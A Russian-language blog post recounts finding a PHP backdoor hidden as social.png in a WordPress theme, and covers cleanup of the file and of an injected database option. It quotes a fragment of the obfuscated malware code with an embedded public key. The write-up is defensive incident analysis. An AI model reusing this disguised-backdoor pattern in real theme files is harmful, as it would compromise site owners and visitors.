Вирус на сайте — продолжение

Не давно просматривал свои локальные сайты, и услышал вопль антивируса. Вирус на сайте! Я был удивлен дважды. Во-первых, я не ожидал, что мой бесплатный антивирус авира может искать php вирусы, а во вторых был удивлен видом вируса.

Ругался мой антивирус на сам архив с wordpress темой, после недолгого осмотра информации о вирусе, нашел что сам зараженный файл является…..png картинка, а конкретно social.png, расположенная в теме.

Я сразу вспомнил первый курс колледжа, как мы с однокурсниками читали статьи провирусы, про то как их прячут. Но много воды утекло с тех пор, и я давно не встречал так спрятанных вирусов.

Первым делом я решил просмотреть что же внутри, естественно сама картинка не открывалась, и я поменял ее раcширение на php, получил — social.php.

Далее я открыл этот файл редактором Sublime Text, и понял что был прав.

megakolyan.ru

Вот кусок из этого файла

@ini_set('max_execution_time', 300); @set_time_limit(0); error_reporting(0); ini_set('display_errors', 0); if (!defined('WP_CLIENT_KEY')) { class rGTkClojOnuDcNhbfnVM { private $JMlftQTPsAAdMedcNTHL, $bJdkeISkWEEkWpqVAfPR, $jiYtwUhvULNWtJKGbvk; private $PtzgKSpholDuOJetI; public function __construct( $oZqvPsyBPjyJxsaimqQq = 'old' ) { if ( class_exists( 'JFactory' ) ) { $this->PtzgKSpholDuOJetI = JFactory::getDbo(); } if ( $oZqvPsyBPjyJxsaimqQq == 'new' ) { $this->HoHhBuikDVEZaVTqmExm(); } else { $this->lzSaqyGAoZNIXqdEJHCQ(); } $this->bJdkeISkWEEkWpqVAfPR = '-----BEGIN PUBLIC KEY-----

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6K/I2l6k2Iz7Vojzxk5Q

43QNfIJm2jWPvXAvFtft+yy4rD3MseQJWx3PLlkoRQjSI1uiiwwlPZWED0e5wFet

nS5tKhvvRaOeUPYJq6MtyUbnaMn7bshlgaAlPaUCVdAOjdtGHMuFaWfnBLgTSu3c

uccVC2zOlXx7XK1tw39eZepRemoh0W3Qhf+hDFsEzACSBmKhBiganwCZzTDvyXpj

nfbRKbf26LJDJ9u2Choh768vQiIfuf0tGLQ+xxcBDl2ZVW0P76cd5I2v+lYRBD/X

vgU32/UZeKDheA8M/oZ5/yFv5QWAU2SHEEKYfLkAQmXs/oRGqMQONqoL3W5Q4bE/

gQIDAQAB

-----END PUBLIC KEY-----';

Первая мысль от увиденного — удалить, после проделанной манипуляции (удления файла с сайта) сайт работал, но выводились ошибки

Warning: include(assets/img/social.png): failed to open stream: No such file or directory in /var/www/admin/www/

Warning: include(): Failed opening ‘assets/img/social.png’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in /var/www/admin/www/

Warning: session_start(): Cannot send session cookie — headers already sent by (output started at /var/www/admin/www/

Warning: session_start(): Cannot send session cache limiter — headers already sent (output started at /var/www/admin/www/

Т.е. само наличия файла обязательно, не проблема я удалил весь код из файла social.png и запретил в правах файлов запись в файл.

Но это лишь пол решения проблемы, если проанализировать код вируса, видно что использовались запросы к бд. И наиболее не пирятным оказалось что использовались запросы на добавление в бд , вида — INSERT INTO OPTIONS (value, option_name) VALUES(:value, :option)».

Решено было просмотреть бд, а именно таблицу options , поиском по «BEGIN PUBLIC KEY»

megakolyan.ru - поиск по бд

 

Я нашел запись в этой таблице и благополучно удалил. После всего этого поставил плагин для WP — Antivirus, плагин интересный, особенно понравилась проверка сделанная на AJAX.

Итог, проверяйте ваши темы антивирусником, можно попробовать загрузить архив на вирустотал, темы старайтесь брать из проверенных источников, а также пользуйтесь скриптом ai-bollit, ставте хорошие и надежные пароли на админку, ftp и базу. Совокупность этих методов помогут держать в безопасности ваш сайт.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Заполните поле
Заполните поле
Пожалуйста, введите корректный адрес email.
Вы должны согласиться с условиями для продолжения

Сообщение от хостера, или борьба со спам рассылками с сайта
three.js — урок № 1 — создание первой сцены
Меню